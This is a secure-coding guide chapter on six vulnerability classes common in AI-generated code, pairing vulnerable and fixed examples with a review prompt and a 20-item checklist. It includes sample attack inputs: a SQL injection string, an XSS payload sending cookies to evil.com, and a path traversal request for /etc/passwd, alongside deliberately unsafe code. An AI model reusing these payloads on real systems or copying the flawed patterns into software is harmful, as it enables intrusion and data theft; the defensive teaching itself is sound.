Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes
Chapter 18: Security Review of AI-Generated Code — Complete Guide to 6 Vulnerability Classes
AI errors are not random — they follow patterns. Training data is full of unsafe legacy code; AI prefers the shortest path, and secure implementations require extra steps. This chapter shows 6 recurring vulnerability classes with runnable wrong-and-right code examples for each, plus detection methods, .cursorrules prevention rules, a reusable AI security review Prompt, and a 20-item checklist.
Chapter goals: Recognize SQL injection, XSS, secret leakage, path traversal, insecure deserialization, and missing authorization in AI-generated code; apply the fix pattern for each; use the AI security review Prompt and 20-item checklist in your team's workflow.
Why AI-Generated Code Has Specific Security Problems
Three root causes — not random noise:
- Training data bias: Stack Overflow and GitHub examples routinely omit security checks ("make it work first"). AI learned those patterns.
- Shortest-path preference: AI gravitates toward the minimal implementation. Parameterized queries, path validation, and authorization checks all require extra code — AI skips them unless explicitly asked.
- No threat model awareness: AI doesn't know whether a variable comes from user input or an internal system, so it can't judge whether validation is needed.
Conclusion: AI code must go through a security review, especially code that handles user input, file operations, and database queries.
Vulnerability 1: SQL Injection (Most Common, Highest Impact)
Wrong — string-concatenated SQL
def get_user(username: str):
query = f"SELECT * FROM users WHERE username = '{username}'"
return db.execute(query)
# Attacker input: ' OR '1'='1
# Executed: SELECT * FROM users WHERE username = '' OR '1'='1'
# Result: returns all users, authentication bypassed
Correct — parameterized queries
# Option 1: Parameterized query (DB-API)
def get_user(username: str):
return db.execute("SELECT * FROM users WHERE username = :username",
{"username": username})
# Option 2: ORM (preferred — handles escaping automatically)
def get_user_orm(username: str, db: Session):
return db.query(User).filter(User.username == username).first()
# Option 3: Dynamic column names — use an allowlist, not concatenation
ALLOWED = {"username", "email"}
def get_by_field(field: str, value: str):
if field not in ALLOWED:
raise ValueError(f"Invalid field: {field}")
return db.execute(f"SELECT * FROM users WHERE {field} = :v", {"v": value})
.cursorrules rule: "All database queries must use parameterized queries or ORM. String concatenation for SQL is forbidden."
Vulnerability 2: XSS (React-Specific Risk)
React auto-escapes JSX text content, but dangerouslySetInnerHTML bypasses that entirely. AI uses it for "convenient rich text rendering" without considering the data source.
Wrong — dangerouslySetInnerHTML on user input
function UserComment({ comment }: { comment: string }) {
return <div dangerouslySetInnerHTML={{ __html: comment }} />;
// If comment is user-controlled: instant XSS
// Attacker: <script>fetch('https://evil.com/?c='+document.cookie)</script>
}
Correct — text render or DOMPurify sanitize
// Option 1: plain text — React auto-escapes (use for 90% of cases)
function UserComment({ comment }: { comment: string }) {
return <div>{comment}</div>;
}
// Option 2: must render HTML — sanitize first
import DOMPurify from 'dompurify';
function RichComment({ html }: { html: string }) {
const clean = DOMPurify.sanitize(html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href', 'target']
});
return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
Vulnerability 3: Hardcoded Secrets
AI fills in real-looking API keys in "example" code. You commit without looking carefully, push to GitHub, and bots find and try the credentials within minutes.
Wrong — secrets in source code
stripe.api_key = "sk_live_abc123xxxxxxxxxxxxxxxxxxxxxxxx"
JWT_SECRET = "mysecretkey123"
DATABASE_URL = "postgresql://admin:[email protected]/mydb"
Correct — all secrets from environment variables
import os
from dotenv import load_dotenv # .env must be in .gitignore
load_dotenv()
# Use [] not .get() — fail loudly if a key is missing
stripe.api_key = os.environ["STRIPE_SECRET_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]
DATABASE_URL = os.environ["DATABASE_URL"]
REQUIRED = ["STRIPE_SECRET_KEY", "JWT_SECRET", "DATABASE_URL"]
missing = [k for k in REQUIRED if not os.environ.get(k)]
if missing:
raise EnvironmentError(f"Missing required env vars: {missing}")
Add gitleaks to your pre-commit hooks to auto-scan staged changes for secrets before every commit.
Vulnerability 4: Path Traversal
AI concatenates user input directly into file paths. Attackers use ../../ to escape the intended directory and read system files.
Wrong — user input concatenated into file path
@app.get("/files/{filename}")
def read_file(filename: str):
path = f"/app/uploads/{filename}"
return open(path).read()
# Attack: GET /files/../../etc/passwd → reads /etc/passwd
Correct — normalize and verify path stays within bounds
import re
from pathlib import Path
from fastapi import FastAPI, HTTPException
BASE = Path("/app/uploads").resolve()
@app.get("/files/{filename}")
def read_file(filename: str):
# Step 1: allowlist — only safe characters
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
raise HTTPException(400, "Invalid filename")
# Step 2: resolve real path (eliminates ../ etc.)
path = (BASE / filename).resolve()
# Step 3: verify real path is inside the base directory
if not str(path).startswith(str(BASE)):
raise HTTPException(403, "Access denied")
if not path.exists():
raise HTTPException(404, "Not found")
return path.read_text()
Vulnerability 5: Insecure Deserialization
Python's pickle executes arbitrary Python code during deserialization. AI commonly suggests it for caching. If the data source is untrusted (Redis compromised, network transmission), it's a critical vulnerability.
Wrong — pickle on external data
import pickle, redis
r = redis.Redis()
def load_session(session_id: str):
data = r.get(f"session:{session_id}")
return pickle.loads(data) if data else None
# If an attacker can write to Redis, they can execute arbitrary code
Correct — JSON + Pydantic validation
import json, redis
from pydantic import BaseModel
class UserSession(BaseModel):
user_id: int
username: str
roles: list[str]
r = redis.Redis()
def load_session(session_id: str) -> UserSession | None:
data = r.get(f"session:{session_id}")
if not data:
return None
return UserSession.model_validate_json(data) # safe — no code execution
def save_session(session_id: str, s: UserSession, ttl: int = 3600):
r.setex(f"session:{session_id}", ttl, s.model_dump_json())
Rule: Never use pickle.loads() on data that crosses a trust boundary — network data, user input, Redis cache, or any external storage.
Vulnerability 6: Missing Authorization
AI generates endpoint logic but forgets authorization checks. Any logged-in user can access any other user's data.
Wrong — checks login but not ownership
@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user=Depends(get_current_user)):
# Verifies login — but any logged-in user can query any user_id
return db.query(Order).filter(Order.user_id == user_id).all()
Correct — verify ownership before returning data
@app.get("/api/users/{user_id}/orders")
def get_orders(user_id: int, current_user: User = Depends(get_current_user)):
if current_user.id != user_id and not current_user.is_admin:
raise HTTPException(403, "Access denied")
return db.query(Order).filter(Order.user_id == user_id).all()
# Better: eliminate the parameter entirely — use current_user.id directly
@app.get("/api/my/orders")
def get_my_orders(current_user: User = Depends(get_current_user)):
return db.query(Order).filter(Order.user_id == current_user.id).all()
# No user_id in URL = no IDOR risk at all
AI Security Review Prompt
You are a security engineer. Review the following code for security issues.
Priority checklist (in order):
1. Database queries: are all using parameterized queries? Any string-concatenated SQL?
2. User input handling: is all untrusted data validated before use?
3. File operations: is the path normalized and verified to stay within the allowed directory?
4. Authorization: does every protected endpoint verify both authentication AND ownership?
5. Secrets: are all credentials read from environment variables? Any hardcoded?
6. Deserialization: is pickle/eval/exec used on data from the network or user input?
Report only real issues. For each finding include:
- File name and line number
- Vulnerability type
- Attack scenario in one sentence
- Working fix code (the correct implementation)
@[file to review]
20-Item Security Checklist for AI-Generated Code
| # | Check item | Level |
|---|---|---|
| 1 | All SQL queries use parameterized queries or ORM — no string concatenation | Must |
| 2 | User input validated before use (Pydantic / Zod / regex) | Must |
| 3 | No secrets, passwords, or tokens hardcoded in source (scan git log) | Must |
| 4 | File path operations are normalized and boundary-checked | Must |
| 5 | Every API endpoint verifies authorization — not just authentication | Must |
| 6 | Error responses don't leak stack traces, DB schema, or internal IPs | Must |
| 7 | pickle/eval/exec not used on network data or user input | Must |
| 8 | All API communication uses HTTPS; no plaintext sensitive data in transit | Must |
| 9 | Passwords hashed with bcrypt or argon2 — not MD5/SHA1 | Must |
| 10 | JWT signature algorithm and secret verified correctly; alg:none rejected | Must |
| 11 | Debug mode disabled in production; detailed error pages off | Must |
| 12 | Rate limiting on APIs to prevent brute-force and DDoS | Recommended |
| 13 | CSRF tokens on state-changing operations (POST/PUT/DELETE) | Recommended |
| 14 | Dependencies updated regularly; pip audit / npm audit runs in CI | Recommended |
| 15 | Logs don't record passwords, tokens, or full credit card numbers | Recommended |
| 16 | Uploaded files validated for type (MIME + extension) and size | Recommended |
| 17 | Database connections use a least-privilege account — not root | Recommended |
| 18 | Sensitive operations (delete, payment, permission change) have audit logs | Recommended |
| 19 | Third-party CDN scripts use Subresource Integrity (SRI) verification | Recommended |
| 20 | Penetration testing done periodically, especially before major feature launches | Recommended |
Chapter Key Points — and a Note to Close the Book
- AI code must be security-reviewed: The vulnerability patterns are predictable — SQL injection, XSS, and hardcoded secrets are the top three. Add this chapter's checklist to your PR template and run through it before every merge.
- Security rules in .cursorrules are the highest-leverage prevention: Better to prevent than detect. Three rules — no SQL concatenation, no dangerouslySetInnerHTML on user input, all secrets from env vars — eliminate 80% of AI-generated security issues before code is even written.
- Path traversal and missing authorization are the most overlooked: SQL injection awareness is now common; path traversal (Path.resolve + boundary check) and IDOR (URL parameter replaced with another user's ID) still appear frequently in AI-generated code.
- Use gitleaks as a pre-commit hook: Once a secret is pushed, it may already be compromised. Local scanning before commit is the last line of defense. Five minutes to configure, prevents major incidents.
- AI makes coding faster — and mistakes faster too: Build security awareness, establish team standards, review regularly. Do those three things and AI is a genuine force multiplier. Skip them and it's a liability. All 18 chapters of this book have given you the tools, techniques, and workflows — what follows is practice and iteration in real projects.
End of book: From Chapter 1 ("Why the AI Coding Era") to Chapter 18 ("AI Code Security Review"), this book has covered everything from setup to production deployment. The AI coding landscape will keep evolving — staying curious and practicing deliberately is the only way to keep up.